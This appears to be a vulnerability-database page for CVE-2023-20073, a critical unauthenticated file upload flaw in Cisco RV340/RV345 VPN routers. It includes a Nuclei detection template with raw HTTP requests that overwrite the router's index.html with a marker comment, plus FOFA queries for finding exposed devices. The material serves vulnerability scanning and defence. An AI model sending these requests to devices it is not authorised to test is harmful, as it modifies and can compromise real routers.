| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2023-20073 | 2 Feb 202300:00 | – | attackerkb | |
| The vulnerability in the web interface for managing microprogrammed software routers of Cisco Small Business RV340, RV340W, RV345, and R345P allows a hacker to load arbitrary files. | 8 Feb 202300:00 | – | bdu_fstec | |
| CVE-2023-20073 | 5 Apr 202320:26 | – | circl | |
| Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Arbitrary File Upload Vulnerability | 1 Feb 202316:00 | – | cisco | |
| Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Arbitrary File Upload (cisco-sa-sb-rv-afu-EXxwA65V) | 7 Feb 202300:00 | – | nessus | |
| Cisco Small Business RV340 代码问题漏洞 | 2 Feb 202300:00 | – | cnnvd | |
| Binary Vulnerability in Various Cisco Products (CNVD-2023-09623) | 9 Jan 202300:00 | – | cnvd | |
| CVE-2023-20073 | 5 Apr 202300:00 | – | cve | |
| CVE-2023-20073 Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Arbitrary File Upload Vulnerability | 5 Apr 202300:00 | – | cvelist | |
| CVE-2023-20073 | 5 Apr 202316:15 | – | nvd |
id: CVE-2023-20073
info:
name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload
author: princechaddha,ritikchaddha
severity: critical
description: |
A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
remediation: |
Apply the latest security patches provided by Cisco to mitigate this vulnerability.
reference:
- https://unsafe.sh/go-173464.html
- https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f
- https://github.com/RegularITCat/CVE-2023-20073/tree/main
- https://nvd.nist.gov/vuln/detail/CVE-2023-20073
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-20073
cwe-id: CWE-434
epss-score: 0.88874
epss-percentile: 0.9976
cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: cisco
product: rv340_firmware
fofa-query:
- app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P"
- app="cisco-rv340" || app="cisco-rv340w" || app="cisco-rv345" || app="cisco-rv345p"
tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive,vkev,vuln
variables:
html_comment: "<!-- {{randstr}} -->" # Random string as HTML comment to append in response body
http:
- raw:
- |
GET /index.html HTTP/1.1
Host: {{Hostname}}
- |
POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1
Host: {{Hostname}}
Authorization: 1
Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf
--------------------------f6f99e26f3a45adf
Content-Disposition: form-data; name="pathparam"
Portal
--------------------------f6f99e26f3a45adf
Content-Disposition: form-data; name="fileparam"
index.html
--------------------------f6f99e26f3a45adf
Content-Disposition: form-data; name="file.path"
index.html
--------------------------f6f99e26f3a45adf
Content-Disposition: form-data; name="file"; filename="index.html"
Content-Type: application/octet-stream
{{index}}
{{html_comment}}
--------------------------f6f99e26f3a45adf--
- |
GET /index.html HTTP/1.1
Host: {{Hostname}}
extractors:
- type: dsl
name: index
internal: true
dsl:
- body_1
matchers:
- type: word
part: body_3
words:
- "{{html_comment}}"
# digest: 4b0a00483046022100be56eb42a5aa338698df462eede473d32a7f39e9c1cea468ae06ed7fb98dcdb5022100cb7ecab38f2ac4580d49623f16787fb139079191eff15fa9a0639ea0a4c697ac:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation